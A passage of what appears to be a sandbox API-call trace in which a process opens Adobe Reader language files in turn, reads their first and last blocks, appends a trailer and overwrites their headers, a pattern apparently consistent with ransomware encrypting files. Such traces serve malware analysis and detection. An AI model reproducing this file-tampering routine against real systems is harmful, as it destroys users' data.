lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_BO.txt", lpUsedDefaultChar=0x0) returned 30 [0099.396] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.411] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5ec8 [0099.411] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.412] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5ec8 [0099.412] WriteFile (in: hFile=0x1cc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.421] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0099.421] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.422] CloseHandle (hObject=0x1cc) returned 1 [0099.422] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_GT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_gt.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0099.422] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.423] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6ec8 [0099.423] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.423] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.423] ReleaseMutex (hMutex=0x168) returned 1 [0099.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_GT.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_GT.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_GT.txt", lpUsedDefaultChar=0x0) returned 30 [0099.423] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.426] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5ec8 [0099.426] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.428] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5ec8 [0099.428] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea4988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4988*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.429] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0099.429] WriteFile (in: hFile=0x1cc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.429] CloseHandle (hObject=0x1cc) returned 1 [0099.429] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_SV.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_sv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0099.430] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.430] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6ec8 [0099.430] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.430] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.430] ReleaseMutex (hMutex=0x168) returned 1 [0099.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_SV.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.430] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_SV.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_SV.txt", lpUsedDefaultChar=0x0) returned 30 [0099.430] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.436] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5ec8 [0099.436] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.437] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5ec8 [0099.437] WriteFile (in: hFile=0x1cc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.438] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0099.438] WriteFile (in: hFile=0x1cc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.438] CloseHandle (hObject=0x1cc) returned 1 [0099.438] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0099.439] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.439] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6d74 [0099.439] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.439] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.439] ReleaseMutex (hMutex=0x168) returned 1 [0099.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fi_FI.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fi_FI.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.fi_FI.txt", lpUsedDefaultChar=0x0) returned 30 [0099.439] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.443] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5d74 [0099.443] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.445] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5d74 [0099.445] WriteFile (in: hFile=0x1cc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.446] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0099.446] WriteFile (in: hFile=0x1cc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.446] CloseHandle (hObject=0x1cc) returned 1 [0099.446] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr_HR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr_hr.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0099.447] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.447] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6e28 [0099.447] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.447] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.447] ReleaseMutex (hMutex=0x168) returned 1 [0099.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.hr_HR.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.hr_HR.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.hr_HR.txt", lpUsedDefaultChar=0x0) returned 30 [0099.447] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.452] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e28 [0099.452] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.454] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e28 [0099.454] WriteFile (in: hFile=0x1cc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.454] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0099.454] WriteFile (in: hFile=0x1cc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.454] CloseHandle (hObject=0x1cc) returned 1 [0099.455] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0099.455] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.455] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x656a [0099.455] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.455] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.456] ReleaseMutex (hMutex=0x168) returned 1 [0099.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ja_JP.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ja_JP.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ja_JP.txt", lpUsedDefaultChar=0x0) returned 30 [0099.456] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.460] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x556a [0099.460] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.461] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x556a [0099.461] WriteFile (in: hFile=0x1cc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.462] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0099.462] WriteFile (in: hFile=0x1cc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.462] CloseHandle (hObject=0x1cc) returned 1 [0099.462] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nb.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nb.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0099.463] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.463] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6df2 [0099.463] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.463] ReleaseMutex (hMutex=0x168) returned 1 [0099.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nb.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nb.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.nb.txt", lpUsedDefaultChar=0x0) returned 27 [0099.463] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.468] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5df2 [0099.468] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.469] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5df2 [0099.470] WriteFile (in: hFile=0x1cc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.470] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0099.470] WriteFile (in: hFile=0x1cc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.471] CloseHandle (hObject=0x1cc) returned 1 [0099.471] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0099.471] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.471] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6e56 [0099.471] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.471] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.472] ReleaseMutex (hMutex=0x168) returned 1 [0099.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pl.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pl.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.pl.txt", lpUsedDefaultChar=0x0) returned 27 [0099.472] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.476] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e56 [0099.476] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0099.477] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e56 [0099.478] WriteFile (in: hFile=0x1cc, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.478] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0099.478] WriteFile (in: hFile=0x1cc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.478] CloseHandle (hObject=0x1cc) returned 1 [0099.479] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 